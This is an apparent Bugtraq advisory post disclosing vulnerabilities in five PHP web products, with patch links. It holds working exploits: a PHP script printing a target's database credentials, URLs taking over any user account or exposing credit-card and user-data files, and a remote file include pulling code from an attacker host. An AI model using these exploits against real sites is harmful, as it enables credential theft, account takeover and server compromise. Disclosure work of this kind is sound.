I sent this three times to webappsec but without resultats. I try so on bugtraq, although that is less appropriate. ----------------------------------------------------- Five products in PHP are vulnerable to various holes. 1) TightAuction Website : http://www.tightprices.com Tested Version : 3.0 Problem : BD informations disclosure Exploit : <? $victime="http://[target]";; include("$victime/config.inc"); print("Infos de la DataBase du site $victime : \n \n"); print("Login : $DB_Username \nPassword : $DB_Password \nServer : $DB_Database"); ?> 2) PY-Membres Website : http://py-scripts.levillage.org/ Tested Version : 3.1 Problem : Access to all accounts Exploit : http://[target]/index.php?pymembs=admin http://[target]/index.php?pymembs=[USER] Problem : <? if ($pymembs) { $login=$pymembs; session_start(); session_register('login'); } else { session_start(); } [...] if(!session_is_registered('login')) { ?> [...] 3) upb PB Website : http://www.webrc.ca/ Tested Version : 1.0b Problem : Informations disclosure Exploit : http://[target]/db/users.dat 4) MidiCart PHP Website : http://www.midicart.com Version : 1 Problems : Informations disclosure, Upload Exploit : http://{target}/admin/credit_card_info.php http://{target}/admin/upload.php 5) Pphlogger Website : http://www.phpee.com Tested Versions : 2.0.9, 2.2.1, 2.2.2a Problem : Include file Exploit : http://[target]/showhits.php3?rel_path=http://[attacker] with http://[attacker]/main_location.inc or http://[attacker]/config.inc.php3 or http://[attacker]/get_userdata.php3 Problem : if (!isset($rel_path)) $rel_path=""; include $rel_path."config.inc.php3"; include $rel_path."get_userdata.php3"; For more details & patchs : In french : http://www.frog-man.org/tutos/5holes10.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes10.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII ----------------------------------------------------- Sorry for my poor english. frog-m@n _________________________________________________________________ Discutez en ligne avec vos amis ! http://messenger.msn.fr
